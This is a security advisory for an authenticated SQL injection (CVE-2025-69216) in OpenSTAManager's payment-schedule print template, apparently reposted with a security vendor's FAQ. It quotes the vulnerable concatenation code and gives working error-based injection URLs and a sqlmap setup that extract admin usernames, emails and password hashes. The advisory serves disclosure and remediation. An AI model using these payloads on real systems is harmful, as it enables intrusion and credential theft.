Summary
An authenticated SQL Injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.
Details
The vulnerability exists in templates/scadenzario/init.php at line 46, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization:
Vulnerable Code:
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
$module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
$id_anagrafica = get('id_anagrafica');
}
The get() function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's prepare() sanitization function, enabling SQL Injection attacks.
Root Cause:
- Missing use of
prepare()function for input sanitization - Direct string concatenation in SQL query construction
- No input validation or type checking
Affected Endpoint:
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]
Affected Files:
templates/scadenzario/init.php(line 46) - Primary vulnerabilitytemplates/scadenzario/init.php(lines 34, 40) - Similar pattern with date parameterspdfgen.php- Entry point for template rendering
PoC (Proof of Concept)
Prerequisites
- Valid authenticated session (any user role)
Exploitation Steps
1. Confirm Vulnerability - Basic Syntax Error Test:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20
SQL syntax error displayed in application response
2. Extract Database Version - Error-Based SQLi:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221
Result: ~8.3.0~ (MySQL version)
3. Extract Database Name:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221
Result: ~openstamanager~
4. Extract Admin Username:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
Result: ~admin~
5. Extract Admin Email:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
Result: Admin email address
6. Extract Password Hash (Partial - XPATH 31 char limit):
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
Result: bcrypt password hash
7. Automated Exploitation with SQLMap:
Create request file sqli_osm.req:
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0
Run SQLMap:
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs
SQLMap Confirmed Injection Types:
- ✅ Boolean-based blind SQL injection
- ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET)
- ✅ Time-based blind SQL injection (SLEEP)
Attribution
Reported by Łukasz Rybak
Impact
Who is Impacted:
- ✅ All authenticated users - Any user with valid credentials can exploit this vulnerability
- ✅ Low-privilege users - Even users with minimal permissions can access admin-level data
- ✅ All OpenSTAManager installations - Vulnerability exists in the latest master branch
Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: Use parameterized queries or prepared statements so user input is always treated as data, never as SQL syntax.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-69216? CVE-2025-69216 is a high-severity SQL injection vulnerability in devcode-it/openstamanager (composer), affecting versions <= 2.9.8. No fixed version is listed yet. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
- Which versions of devcode-it/openstamanager are affected by CVE-2025-69216? devcode-it/openstamanager (composer) versions <= 2.9.8 is affected.
- Is there a fix for CVE-2025-69216? No fixed version is listed for CVE-2025-69216 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2025-69216 exploitable, and should I be worried? Whether CVE-2025-69216 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-69216 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-69216? No fixed version is listed yet. In the interim: Use parameterized queries or prepared statements so user input is always treated as data, never as SQL syntax.